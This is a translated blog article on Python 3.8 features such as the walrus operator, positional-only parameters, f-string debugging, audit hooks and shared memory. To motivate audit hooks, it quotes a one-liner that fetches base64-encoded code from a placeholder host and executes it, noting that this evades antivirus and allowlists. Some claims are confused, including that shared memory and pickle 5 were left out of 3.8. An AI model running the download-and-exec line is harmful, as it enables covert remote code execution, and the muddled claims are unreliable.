Python 3.8: What's New and How to Use It?

The following translation has been prepared specifically for pythonists who are interested in reading for sure about the new Python 3.8 features. In anticipation of the launch of a new thread on the course "Python Developer", we could not get past this topic.

In this article, we'll talk about the new features that were introduced in Python 3.8.




Walrus operator (Assignment operator)


We know that you were waiting for this. This expectation dates back to the days when Python was deliberately forbidden to use "=" as a comparison operator. Some people liked this because they no longer confused = and == in assignment and comparison. Others found it uncomfortable to repeat the operator, or assign it to a variable. Let's move on to an example.

According to Guido, most programmers tend to write:

group = re.match(data).group(1) if re.match(data) else None 

Instead

 match = re.match(data) group = match.group(1) if match else None 

This makes the program run slower. Although it’s understandable why some programmers still don’t write in the first way - it clutters the code.

Now we have the opportunity to do so:

 group = match.group(1) if (match := re.match(data)) else None 

In addition, it is useful when using ifs, so as not to calculate everything in advance.

 match1 = pattern1.match(data) match2 = pattern2.match(data) if match1: result = match1.group(1) elif match2: result = match2.group(2) else: result = None 

And instead, we can write:

 if (match1 := pattern1.match(data)): result = match1.group(1) elif (match2 := pattern2.match(data)): result = match2.group(2) else: result = None 

Which is more optimal, since the second if will not be considered if the first works.

In fact, I am very pleased with the PEP-572 standard, because it not only gives a previously non-existent opportunity, but also uses a different operator for this, so it will not be easy to confuse it with ==.

However, at the same time, it also provides new opportunities for errors and the creation of previously inoperative code.

 y0 = (y1 := f(x)) 

Positional arguments


 def f(a, b, /, c, d, *, e, f): print(a, b, c, d, e, f) 

Here, everything that is before / is strictly positional arguments, and everything after * is just keywords.

 f(10, 20, 30, d=40, e=50, f=60) - valid f(10, b=20, c=30, d=40, e=50, f=60) - b cannot be a keyword argument f(10, 20, 30, 40, 50, f=60) - e must be a keyword argument 

The scope of this function can be expressed in one sentence. It will be easier for libraries to change their signatures. Let's look at an example:

 def add_to_queue(item: QueueItem): 

Now the author should support such a signature, and the parameter name should no longer be changed, since this change will become critical. Imagine that you need to change not just one element, but a whole list of elements:

 def add_to_queue(items: Union[QueueItem, List[QueueItem]]): 

Or so:

 def add_to_queue(*items: QueueItem): 

This is something that you could not do before because of possible incompatibilities with the previous version. Now you can. In addition, this is more consistent with designs that already use this approach. For example, you cannot pass kwargs to the pow function.

 >>> help(pow) ... pow(x, y, z=None, /) ... >>> pow(x=5, y=3) Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: pow() takes no keyword arguments 

Debugging with f-lines


A small additional function that helps us use a compact recording format of the form “variable name =” variable.

 f"{chr(65) = }" => "chr(65) = 'A'" 

Did you notice this after chr (65)? That same trick. It helps provide a shorter way to print variables using f-lines.

Native asyncio shell


Now if we run the Python shell as 'python -m asyncio', we no longer need asyncio.run() to run the asynchronous functions. Await can be used directly from the shell itself:

 >python -m asyncio asyncio REPL 3.8.0b4 Use “await” directly instead of “asyncio.run()”. Type “help”, “copyright”, “credits” or “license” for more information. >>> import asyncio >>> async def test():await asyncio.sleep(1) … return 'hello' … >>> await test() 'hello' 

Python calls runtime audit hooks


The Python Ranime relies heavily on C. However, code executed in it is not logged or tracked in any way. This makes it difficult to monitor the operation of frameworks for testing, frameworks for logging, security tools and, possibly, limits the actions performed by the runtime.

Now you can observe the events triggered by the runtime, including the operation of the module import system and any user hooks.

The new API is as follows:

 # Add an auditing hook sys.addaudithook(hook: Callable[[str, tuple]]) # Raise an event with all auditing hooks sys.audit(str, *args) 

Hooks cannot be deleted or replaced. For CPython, hooks coming from C are considered global, while hooks coming from Python are only for the current interpreter. Global hooks are executed before the interpreter hooks.

One particularly interesting and non-tracked exploit might look like this:

 python -c “import urllib.request, base64; exec(base64.b64decode( urllib.request.urlopen('http://my-exploit/py.b64') ).decode())” 

This code is not scanned by most anti-virus programs, since they focus on recognizable code that is read when loading and writing to disk, and base64 is enough to get around this system. This code will also pass security levels such as file access control lists or permissions (when file access is not required), trusted application lists (assuming that Python has all the necessary permissions), and automatic auditing or logging (provided that Python has access to the Internet or access to another machine on the local network with which you can get the payload).

With runtime event hooks, we can decide how to respond to any particular event. We can either register the event or completely terminate the operation.

multiprocessing.shared_memory


Helps to use the same memory area from different processes / interpreters. Basically, this can help us reduce the time it takes to serialize objects to transfer them between processes. Instead of serializing, queuing, and deserializing, we can just use shared memory from another process.

Pickle Protocol and Out-of-Band Data Buffers


The pickle 5 protocol provides support for out-of-band buffers, where data can be transmitted separately from the main pickle stream at the discretion of the transport layer.

The previous 2 add-ons are very important, but they were not included in the release version of Python 3.8, as there is still some work to do with compatibility with old code, but this can change the approach to parallel programming in Python.

Sub-interpreters


Threads in Python cannot run in parallel due to the GIL, while processes require a lot of resources. Only the beginning of the process takes 100-200 ms, and they also consume a large amount of RAM. But something can cope with them, and these are sub-interpreters. GIL is an interpreter, so it will not affect the work of other interpreters, and it starts easier than a process (albeit slower than a thread).

The main problem that arises in this regard is the transfer of data between interpreters, since they cannot transfer state, as streams do. Therefore, we need to use some kind of connection between them. Pickle, marshal or json can be used to serialize and deserialize objects, but this method will work quite slowly. One solution is to use shared memory from a process module.

Subprocesses seem to be a good solution to GIL problems, but a certain pool of work still needs to be done. In some cases, Python still uses “Runtime State” instead of “Interpreter State”. For example, the garbage collector does just that. Therefore, you need to make changes to many internal modules in order to start using sub-interpreters in a normal way.

I hope this functionality can be fully deployed already in Python version 3.9.

In conclusion, I want to say that a certain syntactic sugar has been added to this version, as well as some serious improvements in the work of libraries and the execution process. However, many interesting features never made it into the release, so we'll wait for them in Python 3.9.

Sources:


Source: https://habr.com/ru/post/472432/


All Articles